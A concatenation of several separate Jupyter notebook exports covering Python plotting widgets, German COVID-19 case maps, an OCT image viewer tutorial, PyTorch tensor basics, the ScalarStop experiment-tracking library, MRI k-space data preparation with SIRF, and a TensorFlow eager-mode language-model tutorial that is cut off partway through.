v = Gaussian1D(stddev=stddev)
grid = np.linspace(-8, 8, 1024)
plt.plot(grid, v(grid))
plt.draw()
fig, ax = plt.subplots(1,1)
interact(plot_gaussian, fig=fixed(fig),
stddev=widgets.FloatSlider(1., min=0.1, max=10.,
continuous_update=False))
```
# Connecting an IPython console to an existing kernel
```
%connect_info
```
Now go to your terminal, type:
`jupyter console --existing`
and define a variable, say:
`a = 15.`
```
print(a)
```
# Pretty display of objects
```
from astropy.constants import G
class KeplerPotential(object):
def __init__(self, m):
self.m = m
def acceleration(self, xyz):
r = np.sqrt(np.sum(xyz**2, axis=0))
return G * self.m * xyz / r[:,None]**3
def _repr_latex_(self):
return (r'$\Phi(r) = -\frac{G \, m}{r};'
+ r'\quad m={:.1e}$'.format(self.m))
pot = KeplerPotential(1.5e10)
pot
```
| github_jupyter |
<a href="https://colab.research.google.com/github/CloseChoice/FlatCurver/blob/dev/data_analysis/notebooks/Corona.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Loading
```
import pandas as pd
import numpy as np
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
url = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/Coronavirus.history.v2.csv'
url_pop = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/einwohner_bundeslaender.csv'
url_rki_neuinfektionen = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/RKI_Neuinfektionen_pro_land_pro_tag.csv'
url_rki_todesfaelle = 'https://raw.githubusercontent.com/CloseChoice/FlatCurver/dev/data/RKI_Todesfaelle_pro_land_pro_tag.csv'
data = pd.read_csv(url)
df_ger = data.loc[data['parent'] == 'Deutschland'].copy()
df_infek = pd.read_csv(url_rki_neuinfektionen)
df_todesfaelle = pd.read_csv(url_rki_todesfaelle)
pop = pd.read_csv(url_pop, sep='\t')
df_ger = pd.merge(df_ger, pop.set_index('Bundesland'), left_on='label', right_index=True, how='left')
df_ger = df_ger.loc[df_ger['label'] != 'Repatriierte', :].copy()
df_todesfaelle.Altersgruppe.unique()
```
# Mapbox
```
fig = px.scatter_mapbox(df_ger, lat="lat", lon="lon", size="confirmed", animation_frame='date',
color_continuous_scale=px.colors.cyclical.IceFire)
fig.update_layout(mapbox_style="open-street-map").update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',
'paper_bgcolor': 'rgba(0, 0, 0, 0)',
'mapbox': {'pitch': 10, 'zoom': 5}})
fig.show()
fig = px.density_mapbox(df_ger, lat='lat', lon='lon', z='confirmed', radius=50, animation_frame='date', zoom=5, range_color=[0, max(df_ger['confirmed'])], height=800)
fig.update_layout(mapbox_style="open-street-map").update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',
'paper_bgcolor': 'rgba(0, 0, 0, 0)',
'mapbox': {'pitch': 10, 'zoom': 5}})
fig.show()
```
# Plots
```
fig = px.line(df_ger, x='date', y='confirmed', color='label')
fig.show()
fig = px.line(df_ger, x='date', y='confirmed', color='label', log_y=True)
fig.show()
```
# W.I.P.
```
df_bundesweit = df_ger.groupby('date').sum().reset_index()
fig = px.line(df_bundesweit, x='date', y='confirmed', log_y=True)
fig.show()
```
## TODO
* Add functions for marker
* Add Date to Mapbox
```
df_bundesweit = df_ger.groupby('date').sum().reset_index()
fig = make_subplots(rows=1, cols=2, specs=[[{"type": "mapbox"}, {"type": "xy"}]])
fig.add_trace(go.Densitymapbox(lat=df_ger['lat'], lon=df_ger['lon'], z=df_ger['confirmed']), row=1, col=1).update_layout(mapbox_style="open-street-map", mapbox_center_lon=11,
mapbox_center_lat=50).update_layout({'plot_bgcolor': 'rgba(0, 0, 0, 0)',
'paper_bgcolor': 'rgba(0, 0, 0, 0)',
'mapbox': {'pitch': 10, 'zoom': 5}})
fig.add_trace(go.Scatter(x=df_bundesweit['date'], y=df_bundesweit['confirmed'], name='Bundesweit'), row=1, col=2)
fig.update_layout(height=800, showlegend=False, title_text='Bundesweite Entwicklung',
updatemenus=[
dict(active=0,
buttons=list([
dict(
args=[{'yaxis': {'type': 'linear'}}],
label="Linear",
method="relayout"
),
dict(
args=[{'yaxis': {'type': 'log'}}],
label="Log",
method="relayout"
)
]),
direction="down",
pad={"r": 10, "t": 10},
showactive=True,
xanchor="left",
yanchor="top",
x=0,
y=1.075,
),
]
)
fig.show()
```
| github_jupyter |
# Tutorial 10: Editting the editsettings.ini using the .ofd viewer
```
#Import required system libraries for file management
import sys,importlib,os
# Provide path to oct-cbort library
module_path=os.path.abspath('C:\\Users\SPARC_PSOCT_MGH\Documents\GitHub\oct-cbort')
if module_path not in sys.path:
sys.path.append(module_path)
# Import oct-cbort library
from oct import *
```
Within the view module lies two types of viewers:
1) OFDView - For unprocessed, raw .ofd data, serving the purpose of optimizing the editsettings.ini before running the processing over the entire volume.
2) MGHView - A multi-dimensional slicer that uses binary memory mapping to access any view of the outputted data.
Here we will look at the first, *.ofd viewer.
### OFDView
```
# Put any directory here
directory = 'G:\\Damon\Damon_Temp_test\[p.D8_9_4_19][s.baseline][09-04-2019_09-07-30]'
# put whatever processing states you want to visualize on the fly
state = 'struct+angio+ps+hsv'
viewer = OFDView(directory, state)
viewer.run()
```
<img src="resources/ofdview_snapshot.png">
### Viewing before processing!
A fun aspect of using the GPU is that we can process things very fast. This allows us to actually scroll through all the frames processing them nearly on the fly.
### Saving a smaller index range in Z
Using the low and high inputs on the left input area, below all the processed image types, you can change the crop size of the processed image. The cropping is done early on in the processing, at the tomogram stage, which ultimately allows for faster processing and smaller output file sizes
### Quick Projection of the structure dataset
By performing serious downsampling in 3D on the fringes, we can generate a quik projection of the structure using the " Quick Prpjection" button at the bottom ... just to make sure we don't miss anything with our processing range!
### Outputting new editsettings.ini files
Change with the settings, update that in the data object by clikcing update and then generate the new editsettings.ini file by using the button in the top right of the GUI.
**Remember, this editsettings.ini file will not be used until it is placed in the settings folder.**
## Accessing the viewer from CMD
### 1. Using python -m oct , button in middle right hand side
<img src="resources/cmd_snapshot.png" width="600"> <img src="resources/simplegui_snapshot.png" width="400">
### 2. Using the python -m oct.view ofd
ie. > python -m oct.view ofd G:\Damon\Damon_Temp_test\OA_Rotation\[p.SPARC][s.oa_test_2_180][08-09-2019_09-55-50] struct+angio+ps
| github_jupyter |
# 2. Introduction to tensors
Free after [Deep Learning with PyTorch, Eli Stevens, Luca Antiga, and Thomas Viehmann](https://www.manning.com/books/deep-learning-with-pytorch)
```
%%HTML
<style>
th {
font-size: 24px
}
td {
font-size: 16px
}
</style>
from intro_to_pytorch import test
import torch
from matplotlib import pyplot as plt
import numpy as np
import seaborn as sns
sns.set_theme(style="ticks")
```
## Key concepts of this section
1. A `Tensor` is a `View` onto a `Storage`
2. `contiguous` memory layout enables fast computations
3. `broadcasting`: expand Tensor dimensions as needed
## Fundamentals
### Contrast to python list
<!--  -->
<div align="center">
<img src="../img/memory.svg" width="1200px" alt="in pytorch, a tensor refers to numbers in memory that are all next to each other">
</div>
| entity | plain python | pytorch|
|:-------|:------------:|:------:|
| numbers | **boxed**: objects with reference counting | 32 bit numbers|
| lists | sequential (1dim) collections of pointers to python objects | **adjacent entries in memory**: optimized for computational operations |
| interpreter | slow list and math operations | fast |
### Instantiation
Default type at instantiation is torch.float32
```
a = torch.ones(3); print(a, a.dtype)
b = torch.zeros((3, 2)).short(); print(b)
c = torch.tensor([1.,2.,3.], dtype=torch.double); print(c)
torch.tensor??
```
### Tensors and storages
* the `torch.Storage` is where the numbers actually are
* A `torch.Tensor` is a view onto a *torch.Storage*
```
a = torch.tensor([1,2,3,4,5,6])
b = a.reshape((3,2))
assert id(a.storage()) == id(b.storage())
```
* layout of the storage is always *1D*
* hence, changing the value in the storage changes the values of all views (i.e. torch.Tensor) that refer to the same storage
### Size, storage offset, and strides
<div align="center">
<img src="../img/tensor.svg" width="1200px" alt="Meaning of size, offset and stride">
</div>
* A Tensor is a view on a storage that is defined by its
* **size:** `t.size()` / `t.shape`
* **storage offset:** `t.stoage_offset()`
* **stride:** `t.stride()`
* the **stride** informs how many elements in the storage one needs to move to get to the next value in that dimension
* to get `t[i,j]`, get `storage_offset + i * stride[0] + j * stride[1]` of storage
* this makes some tensor operations very cheap, because a new tensor has the same storage but different values for size, offset and stride
```
a = torch.tensor([[1,2,3], [4,5,6]])
print(f"a.size: {a.size()}")
print(f"a.storage_offset: {a.storage_offset()}")
print(f"a.stride: {a.stride()}")
b = a[1]
print(f"b.size: {b.size()}")
print(f"b.storage_offset: {b.storage_offset()}")
print(f"b.stride: {b.stride()}")
```
#### Transposing a tensor
* the transpose just swaps entries in size and stride
<div align="center">
<img src="../img/transpose.svg" width="1200px" alt="Transpose explained">
</div>
#### Contiguous
* A tensor whose values are laid out in the storage starting from the right most dimension onward is **contiguous**
* e.g. 2D tensor:
* `t.size() # torch.Size([#rows, #columns])`
* moving along rows (i.e. fix row, go from one column to the next) is equivalent to going through storage one by one
* this data locality improves performance
```
a = torch.tensor([[1,2,3], [4,5,6]])
assert a.is_contiguous()
b = a.t()
assert not b.is_contiguous()
c = b.contiguous()
assert c.is_contiguous()
```
### Numeric types
* `torch.floatXX`: 32: float, 64: double, 16: half
* `torch.intXX`: 8, 16, 32, 64
* `torch.uint8`: torch.ByteTensor
* `torch.Tensor`: equivalent to torch.FloatTensor
## Exercise 1:
Create a tensor `a` from `list(range(9))`. Predict then check what the size, offset, and strides are.
```
a = torch.tensor(range(9))
test.test_attributes(a)
```
## Exercise 2:
Create a tensor `b = a.view(3, 3)`. What is the value of `b[1,1]`?
```
b = a.view(3, 3)
b[1,1]
```
## Exercise 3:
Create a tensor `c = b[1:,1:]`. Predict then check what the size, offset, and strides are.
```
c = b[1:,1:]
test.test_attributes(c)
```
# Indexing and Broadcasting
## Indexing
* similar to [numpy indexing](https://numpy.org/devdocs/user/basics.indexing.html), e.g. `points[1:, 0]`: all but first rows, first column
#### Tips and tricks
```
# Pairwise indexing works
t = torch.tensor(range(1, 10)).reshape(3, -1)
diagonal = t[range(3), range(3)]
diagonal
# Inject additional dimensions with indexing
t = torch.rand((3, 64, 64))
# Index with `None` at second dim to `unsqeeze`.
assert t[:, None].shape == torch.Size([3, 1, 64, 64])
# Do it multiple times
assert t[:, None, : , None].shape == torch.Size([3, 1, 64, 1, 64])
# Can also use ellipsis
assert t[..., None].shape == torch.Size([3, 64, 64, 1])
```
## Exercise 4:
Get the diagonal elements of `t.rand(3, 3)` by reshaping into a 1d tensor and taking every fourth element, starting from the first.
```
t = torch.rand(3,3)
# TODO: Calculate actual tensor
diag_actual = t.reshape(-1)[::4]
test.test_indexing(t, diag_actual)
```
## Broadcasting
Look at the examples below and think about why we can multiply two tensors of different shapes and get the result that one would expect?
```
a = torch.tensor([
3
])
b = torch.tensor([
1, 2, 3
])
torch.allclose(a*b, torch.tensor([
3, 6, 9
]))
a = torch.tensor([
[1, 2],
[3, 4]
])
b = torch.tensor([
1, 2
])
torch.allclose(a*b, torch.tensor([
[1, 4],
[3, 8]
]))
```
The answer is that PyTorch magically *expands* the shape of the tensors in a smart way such that operations can be performed.
→ This is called **broadcasting**.
### How is broadcasting done?
1. Compare the dimensions of all tensors, starting from the trailing one.
2. If dims are the same, do nothing
3. If one dim is 1 (or missing), expand it to match the other dim.
4. Else: abort
**Note:** When broadcasting, PyTorch does not actually need to expand the dimensions of a tensor in memory in order to perform efficient tensor operations.
```
Example 1
[a]: 3 x 64 x 64
[b]: 1
[a*b]: 3 x 64 x 64
Example 2
[a]: 3 x 1 x 64
[b]: 1 x 64 x 1
[a*b]: 3 x 64 x 64
```
## Exercise 5 - Broadcasting:
Write down the shapes of the tensors in the examples and convince yourself that the output shape is as expected.
```
a = torch.rand((3,64,64))
b = torch.rand(1)
(a*b).shape
a = torch.rand((3,1,64))
b = torch.rand((1,64,1))
(a*b).shape
```
| github_jupyter |
# Organize your machine learning experiments with ScalarStop
### What is ScalarStop?
ScalarStop helps you train machine learning models by:
* creating a system to uniquely name datasets, model
architectures, trained models, and their
hyperparameters.
* saving and loading datasets and models to/from the
filesystem in a consistent way.
* recording dataset and model names, hyperparameters, and
training metrics to a SQLite or PostgreSQL database.
### Installing ScalarStop
ScalarStop is [available on PyPI](https://pypi.org/project/scalarstop/). You can install it from
the command line using::
pip3 install scalarstop
### Getting started
First, we will organize your training, validation, and test sets with subclasses of a `DataBlob` objects.
Second, we will describe the architecture of your machine learning models with subclasses of `ModelTemplate` objects.
Third, we'll create a `Model` subclass instance that initializes a model with a `ModelTemplate` and trains it on a `DataBlob`'s training and validation sets.
Finally, we will save the hyperparameters and training metrics from many `DataBlob`s, `ModelTemplate`s, and `Model`s into a SQLite or PostgreSQL database using the `TrainStore` client.
But first, let's import the modules we'll need for this demo.
```
import os
import scalarstop as sp
import tensorflow as tf
```
### Table of Contents
#### 1. [**DataBlob**: Keeping your training dataset organized](#DataBlob:-Keeping-your-training-dataset-organized)
#### 2. [**ModelTemplate**: Parameterizing your model creation](#ModelTemplate:-Parameterizing-your-model-creation)
#### 3. [**Model**: Combine your ModelTemplate with your DataBlob](#Model:Combine-your-ModelTemplate-with-your-DataBlob)
#### 4. [**TrainStore**: Save and query your training metrics in a database](#TrainStore:-Save-and-query-your-machine-learning-metrics-in-a-database)
---
### `DataBlob`: Keeping your training dataset organized
The first step to training machine learning models with ScalarStop is to encase your dataset into a `DataBlob`.
A `DataBlob` is a set of three `tf.data.Dataset` pipelines--representing your training, validation, and test sets.
When you create a `DataBlob`, variables that affect the creation of the `tf.data.Dataset` pipeline are are stored in a nested Python dataclass named `Hyperparams`. Only store simple JSON-serializable types in the `Hyperparams` dataclass.
Creating a new `DataBlob` with `Hyperparams` looks roughly like this:
```python
from typing import List, Dict
import scalarstop as sp
class my_datablob_group_name(sp.DataBlob):
@sp.dataclass
class Hyperparams(sp.HyperparamsType):
a: int
b: str
c: Dict[str, float]
d = List[int]
# ... more setup below ...
```
Then, we define three methods on our `DataBlob` subclass:
- `set_training()`
- `set_validation()`
- `set_test()`
Each one of them has to create a *new* instance of a `tf.data.Dataset` pipeline with data samples and labels zipped together. Typically that looks like:
```python
# Create a tf.data.Dataset for your training samples.
samples = tf.data.Dataset.from_tensor_slices([1, 2, 3])
# And another tf.data.Dataset for your training labels.
labels = tf.data.Dataset.from_tensor_slices([0, 1, 0])
# And zip them together.
tf.data.Dataset.zip((samples, labels))
```
Do not apply any batching at this stage. We will do that later.
Now we'll create a `DataBlob` that contains the Fashion MNIST dataset.
```
class fashion_mnist_v1(sp.DataBlob):
@sp.dataclass
class Hyperparams(sp.HyperparamsType):
num_training_samples: int
def __init__(self, hyperparams):
"""
You only need to override __init__ if you want to validate
your hyperparameters or add arguments that are not hyperparameters.
One example of a non-hyperparameter argument would be a
database connection URL.
"""
if hyperparams["num_training_samples"] > 50_000:
raise ValueError("num_training_samples should be <= 50_000")
super().__init__(hyperparams=hyperparams)
(self._train_images, self._train_labels), \
(self._test_images, self._test_labels) = \
tf.keras.datasets.fashion_mnist.load_data()
def set_training(self) -> tf.data.Dataset:
"""The training set."""
samples = tf.data.Dataset.from_tensor_slices(
self._train_images[:self.hyperparams.num_training_samples]
)
labels = tf.data.Dataset.from_tensor_slices(
self._train_labels[:self.hyperparams.num_training_samples]
)
return tf.data.Dataset.zip((samples, labels))
def set_validation(self) -> tf.data.Dataset:
"""
The validation set.
In this example, the validation set does not change with the
hyperparameters. This allows us to compare results with
different training sets to the same validation set.
However, if your hyperparameters specify how to engineer
features, then you might wnat the validation set and
training set to rely on the same hyperparameters.
"""
samples = tf.data.Dataset.from_tensor_slices(
self._train_images[50_000:]
)
labels = tf.data.Dataset.from_tensor_slices(
self._train_labels[50_000:]
)
return tf.data.Dataset.zip((samples, labels))
def set_test(self) -> tf.data.Dataset:
"""The test set. Used to evaluate models but not train them."""
samples = tf.data.Dataset.from_tensor_slices(
self._test_images
)
labels = tf.data.Dataset.from_tensor_slices(
self._test_labels
)
return tf.data.Dataset.zip((samples, labels))
```
Here we create a `DataBlob` instance with a dictionary to set our `Hyperparams`.
The `DataBlob` name is computed by hashing your `DataBlob` subclass class name and the names and values of your `Hyperparams`.
```
datablob1 = fashion_mnist_v1(hyperparams=dict(num_training_samples=10))
datablob1.name
```
The `DataBlob` group name is by default the `DataBlob` subclass name.
```
datablob1.group_name
print(datablob1.hyperparams)
```
Now we create another `DataBlob` instance with a different value for `Hyperparams`.
Note that it has a different automatically-generated `name`, but it'll have the same `group_name`.
```
datablob2 = fashion_mnist_v1(hyperparams=dict(num_training_samples=50))
datablob2.name, datablob2.group_name
datablob1.training.take(1)
```
We can save a DataBlob to the filesystem and load it back later.
```
os.makedirs("datablobs_directory", exist_ok=True)
datablob1.save("datablobs_directory")
```
Here, we use the classmethod `from_filesystem()` to calculate the exact path of our saved `DataBlob` using a copy of the `DataBlob`'s hyperparameters.
```
loaded_datablob1 = fashion_mnist_v1.from_filesystem(
hyperparams=dict(num_training_samples=10),
datablobs_directory="datablobs_directory",
)
loaded_datablob1
```
Alternatiely, if we know the exact directory name of our saved `DataBlob`1, we can load it with `with_exact_path()`.
```
loaded_datablob2 = fashion_mnist_v1.from_exact_path(
os.path.join("datablobs_directory", datablob1.name)
)
loaded_datablob2
```
---
### `ModelTemplate`: Parameterizing your model creation
The `ModelTemplate` is the same concept as the `DataBlob`, but instead of three `tf.data.Dataset` s, the `ModelTemplate` creates a machine learning framework model object.
Here is an example of creating a Keras model. Building and compiling the model is parameterized by values in the `Hyperparams` dataclass.
```
class small_dense_10_way_classifier_v1(sp.ModelTemplate):
@sp.dataclass
class Hyperparams(sp.HyperparamsType):
hidden_units: int
optimizer: str = "adam"
def new_model(self):
model = tf.keras.Sequential(
layers=[
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(
units=self.hyperparams.hidden_units,
activation="relu",
),
tf.keras.layers.Dense(units=10)
],
name=self.name,
)
model.compile(
optimizer=self.hyperparams.optimizer,
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=["accuracy"],
)
return model
```
Once again, the `ModelTemplate` has a unique name generated by hashing your subclass and the `Hyperparams`.
```
model_template = small_dense_10_way_classifier_v1(hyperparams=dict(hidden_units=3))
model_template.name
```
---
### `Model`:Combine your `ModelTemplate` with your `DataBlob`
`DataBlob`s and `ModelTemplate`s are not very useful until you bring them together with a `Model`.
A `Model` is an object created by pairing together a `ModelTemplate` instance and a `DataBlob` instance, for the purpose of training the machine learning model created by the `ModelTemplate` on the `DataBlob`'s training and validation sets.
Make sure to batch your `DataBlob` before using it.
```
datablob = datablob2.batch(2)
model = sp.KerasModel(
datablob=datablob,
model_template=model_template,
)
```
Once again, the `Model` has a unique name. But this time it is just a concatenation of the `DataBlob` and `ModelTemplate` names.
```
model.name
model.fit(final_epoch=2, verbose=1)
```
In ScalarStop, training a machine learning model is an idempotent operation. Instead of saying, "Train for $n$ **more** epochs," we say, "Train until the model has been trained for $n$ epochs **total**."
If we call `model.fit()` again with `final_epoch()` still at 2, we get the same metrics but no training happened.
```
model.fit(final_epoch=2, verbose=1)
```
Training ScalarStop `Model`s are idempotent because they keep track of how many epochs they have been trained for and the generated training metrics (e.g. loss, accuracy, etc.). This information is saved to the filesystem if you call `model.save()` and is loaded back from disk if you create a new `Model` object with `Model.from_filesystem()` or `Model.from_filesystem_or_new()`.
```
os.makedirs("models_directory", exist_ok=True)
model.save("models_directory")
os.listdir("models_directory")
```
This is an example of us loading the model back, calculating the exact filename based on the hyperparameters of both the `DataBlob` and `ModelTemplate`.
```
model2 = sp.KerasModel.from_filesystem(
datablob=datablob,
model_template=model_template,
models_directory="models_directory",
)
print(model2.name)
model2.history
```
If you provide `models_directory` as an argument to `fit()`, ScalarStop will save the model to the filesystem after every epoch.
```
_ = model2.fit(final_epoch=5, verbose=1, models_directory="models_directory")
```
Once again, ScalarStop saves the model's trainining history alongside the model's weights, but this is not very convenient if you want to do large-scale analysis on the training metrics of many models at once.
A better way of storing the training metrics is to use the `TrainStore`.
---
### `TrainStore`: Save and query your machine learning metrics in a database
The `TrainStore` is a client that saves hyperparameters and training metrics to a SQLite or PostgreSQL database. Let's create a new `TrainStore` instance that will save data to a file named `train_store.sqlite3`.
```
train_store = sp.TrainStore.from_filesystem(filename="train_store.sqlite3")
train_store
```
The `TrainStore` is also available as a Python context manager.
```python
with sp.TrainStore.from_filesystem(filename="train_store.sqlite3") as train_store:
# use the TrainStore here
# here the TrainStore database connection is automatically closed for you.
```
We don't use it that way in this example because we want to use the TrainStore across multiple Jupyter notebook cells.
And if we want to connect to a PostgreSQL database, the syntax looks like:
```python
connection_string = "postgresql://username:password@hostname:port/database"
with sp.TrainStore(connection_string=connection_string) as train_store:
# ...
```
The `TrainStore` will automatically save your `DataBlob` and `ModelTemplate` name, group name, and hyperparameters to the database. And when you train a `Model`, the `TrainStore` will persist the model name and the epoch training metrics.
All of this happens automatically if you pass the `TrainStore` instance to `Model.fit()`.
```
_ = model.fit(final_epoch=5, train_store=train_store)
```
Once you have some information in the `TrainStore`, you can query it for information and receive results as a Pandas `DataFrame`.
First, let's list the `DataBlob`s that we have saved:
```
train_store.list_datablobs()
```
...and the `ModelTemplate`s that we have saved:
```
train_store.list_model_templates()
```
...and the models that we have trained:
```
train_store.list_models()
```
...and this is how we query for the training history for a given model:
```
train_store.list_model_epochs(model_name=model.name)
model_template_2 = small_dense_10_way_classifier_v1(hyperparams=dict(hidden_units=5))
model_2 = sp.KerasModel(datablob=datablob, model_template=model_template_2)
_ = model_2.fit(final_epoch=10, train_store=train_store)
train_store.list_model_epochs(model_name=model_2.name)
```
| github_jupyter |
```
from pathlib import Path
import nibabel as nib
import numpy as np
from tqdm import tqdm
import sys
sys.path.append("/home/jovyan/P1-Temp-Reg/notebooks")
import mathplus_p1_auxiliary_functions as aux
root_path = Path("/mnt/materials/SIRF/MathPlusBerlin/DATA/ACDC-Daten/")
fpath_output = Path("/home/jovyan/InputData/")
fpath_output.mkdir(exist_ok=True, parents=True)
def get_subdirs(path: Path):
list_paths = []
for path in Path(path).iterdir():
if path.is_dir():
list_paths.append(path)
return list_paths
dirs_acdc = get_subdirs(root_path)
def crop_image(imgarr, cropped_size):
imgdims = np.array(imgarr.shape)//2
xstart = imgdims[0] - cropped_size//2
xend = imgdims[0] + cropped_size//2
ystart = imgdims[1] - cropped_size//2
yend = imgdims[1] + cropped_size//2
return imgarr[xstart:xend, ystart:yend,...]
def get_cropped_image(path: Path):
img = nib.load(str(path / "image.nii.gz"))
cropsize=128
cropped_arr = crop_image(img.get_fdata(), cropsize)
return np.squeeze(cropped_arr)
def get_formatted_image(path: Path, num_phases, time_usf):
img = get_cropped_image(path)
if img.shape[3] < num_phases:
return None
img = img[...,1:num_phases:time_usf]
return img
min_num_phases = 24
time_usf = 2
i=0
for curr_dir in tqdm(dirs_acdc):
list_patients = get_subdirs(curr_dir)
for pat in list_patients:
img = get_formatted_image(pat, min_num_phases, time_usf)
if img is None:
break
for islice in range(img.shape[2]):
dat = np.squeeze(img[:,:,islice,:])
dat = np.swapaxes(dat, 0, 2)
nii = nib.Nifti1Image(dat, np.eye(4))
nib.save(nii, str(fpath_output / "img_{}.nii".format(i)))
i += 1
```
Now we have to prepare the k-space data
```
import sirf.Gadgetron as pMR
import numpy as np
fname_template = fpath_output / "template/cine_128_30ph_bc.h5"
template_data = pMR.AcquisitionData(str(fname_template))
template_data = pMR.preprocess_acquisition_data(template_data)
template_phase = template_data.get_ISMRMRD_info("phase")
index_all_acquis = np.arange(template_data.number())
index_interesting_acquis = template_phase < (min_num_phases// time_usf)
index_interesting_acquis = index_all_acquis[index_interesting_acquis]
template_data = template_data.get_subset(index_interesting_acquis)
template_data = aux.undersample_cartesian_data(template_data)
print(template_data.shape)
import sirf.Reg as pReg
csm = pMR.CoilSensitivityData()
csm.calculate(template_data)
csm.fill(1 + 0. * 1j)
template_img = pMR.ImageData()
template_img.from_acquisition_data(template_data)
E = pMR.AcquisitionModel(acqs=template_data, imgs=template_img)
E.set_coil_sensitivity_maps(csm)
template_fwd = pMR.ImageData()
template_fwd.from_acquisition_data(template_data)
path_input = fpath_output
list_stacks = sorted(path_input.glob("img*"))
for f in tqdm(list_stacks):
fileidx = str(f.stem).split('_')[1]
nii = pReg.ImageData(str(f))
template_fwd.fill(nii.as_array())
rd = E.forward(template_fwd)
fout = fpath_output / "y_{}.h5".format(fileidx)
rd.write(str(fout))
list_rawdata = sorted(path_input.glob("y_*"))
for f in tqdm(list_rawdata):
fileidx = str(f.stem).split('_')[1]
ytmp = pMR.AcquisitionData(str(f))
itmp = E.backward(ytmp)
nii = nib.Nifti1Image(itmp.as_array(), np.eye(4))
fout = fpath_output / "cmplx_zfrecon_{}.nii".format(fileidx)
nib.save(nii,str(fout))
nii = nib.Nifti1Image(np.abs(itmp.as_array()), np.eye(4))
fout = fpath_output / "zfrecon_{}.nii".format(fileidx)
nib.save(nii,str(fout))
```
| github_jupyter |
**Note**: The code has been adapted from the [official tutorial on using eager for LM](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/eager/python/examples/rnn_ptb/rnn_ptb.py)
In this notebook, we will explore how to build a **Neural Language Model**. Rather than directly showing code for the NLM, we will arrive at it step-by-step by discussing all key components.
We will also leverage **tf.data** to build our data pipeline, something we found to be missing in the official tutorial.
### P1: Enable Eager execution
* We use `tfe` to add variables
* enable_eager_execution() should be the first command in your notebook. Note that executing this again throws an error! Restart your notebook kernel to re-execute!
```
import tensorflow as tf
import tensorflow.contrib.eager as tfe
tf.enable_eager_execution()
```
### P2: Fixed random seed
* A fixed random seed is required to reproduce your experiments!
* This can help you debug your code!
* You can select any number of your choice. We selected 42, any guesses why? :)
```
tf.set_random_seed(42)
```
### P3: Embedding Model
Let us begin by building an **Embedding Model**. The job of embedding model is simple: Given a tensor of word indexes, return corresponding vectors (or rows)
```
class Embedding(tf.keras.Model):
def __init__(self, V, d):
super(Embedding, self).__init__()
self.W = tfe.Variable(tf.random_uniform(minval=-1.0, maxval=1.0, shape=[V, d]))
def call(self, word_indexes):
return tf.nn.embedding_lookup(self.W, word_indexes)
```
Let us give it a try by finding embeddings for word indexes: 5 and 100
```
word_embeddings = Embedding(5000, 128)
vecs = word_embeddings([5, 100])
print(vecs.numpy().shape)
vecs = word_embeddings([[5, 100, 40], [2, 300, 90]])
print(vecs.numpy().shape)
```
### P4: RNN Cell...
We now have the ability to feed vectors for each time step. Now let us say we see two words and want to predict the third word in a sentence. We need a mechanism that can **summarize** all the words seen so far, and use the **summary** to generate a probability distribution for the next word.
**Recurrent Neural Network(RNN)** does precisely that: It maintains a lossy summary of the inputs seen so far!
<img src="recurrent_eqn@2x.png" alt="drawing" width="200"/>
Let us assume we have a batch of 2 sentences, each sentence has 3 words.
We will come to how RNN will handle variable length sentences...
```
word_indexes = [[20, 30, 400], [500, 0, 3]]
word_vectors = word_embeddings(word_indexes)
```
**Question**: What should be shape of word_vectors? Recall em returns vectors of size 128
```
print(word_vectors.numpy().shape)
```
It seems we will not be able to pass the word_vectors directly. RNN proceses inputs **one time step** at a time!
Enter, [tf.unstack](https://www.tensorflow.org/api_docs/python/tf/unstack)

```
word_vectors_time = tf.unstack(word_vectors, axis=1)
print(f'word_vectors_time: len:{len(word_vectors_time)} Shape[0]: {word_vectors_time[0].shape}')
cell = tf.nn.rnn_cell.BasicRNNCell(256)
init_state = cell.zero_state(batch_size=int(word_vectors.shape[0]), dtype=tf.float32)
output, state = cell(word_vectors_time[0], init_state)
print(output.shape)
```
* You might be wondering: We only talked about hidden state $h_t$ till now, why do we have two vectors being computed output and state.
* For a BasicRNNCell output and state are identical.
* For LSTM and GRU they have different meaning. All we need to understand is that it uses state and output to do its magic of being able to maintain and learn long term dependencies.
* We would mostly use state to pass it to next time step, and output to make predictions at that time step.
* Read this [excellent blog post on LSTM](http://colah.github.io/posts/2015-08-Understanding-LSTMs/), in case you are interested in how LSTM works
### P5: RNN Model
Now, we have all the pieces to build an RNN Model. Let us see how this works:
```
class RNN(tf.keras.Model):
def __init__(self, h, cell):
super(RNN, self).__init__()
if cell == 'lstm':
self.cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=h)
elif cell == 'gru':
self.cell = tf.nn.rnn_cell.GRUCell(num_units=h)
else:
self.cell = tf.nn.rnn_cell.BasicRNNCell(num_units=h)
def call(self, word_vectors):
word_vectors_time = tf.unstack(word_vectors, axis=1)
outputs = []
state = self.cell.zero_state(batch_size=int(word_vectors.shape[0]), dtype=tf.float32)
for word_vector_time in word_vectors_time:
output, state = self.cell(word_vector_time, state)
outputs.append(output)
return outputs
word_indexes = [[20, 30, 400], [500, 0, 3]]
word_vectors = word_embeddings(word_indexes)
rnn = RNN(128, 'rnn')
rnn_outputs = rnn(word_vectors)
# Prints "Num outputs: 3 Shape[0]: (2, 128)"
print(f'Num outputs: {len(rnn_outputs)} Shape[0]: {rnn_outputs[0].numpy().shape}')
```
### P6: Data pipeline
We will work with a standard LM dataset: PTB dataset from Tomas Mikolov's webpage:
```bash
wget http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz
tar xvf simple-examples.tgz
```
The first thing, we do with any data is to take a peek at it.
```bash
head -3 simple-examples/data/ptb.train.txt
```
```
aer banknote berlitz calloway centrust cluett fromstein gitano guterman hydro-quebec ipo kia memotec mlx nahb punts rake regatta rubens sim snack-food ssangyong swapo wachter
pierre <unk> N years old will join the board as a nonexecutive director nov. N
mr. <unk> is chairman of <unk> n.v. the dutch publishing group
```
Some key points to note:
* We see here that there is a $<unk>$ token already.
* There also seems another token $N$. This identifies a number.
* Rest all words seem to be lower cased
Let us count up the vocab quickly!
```
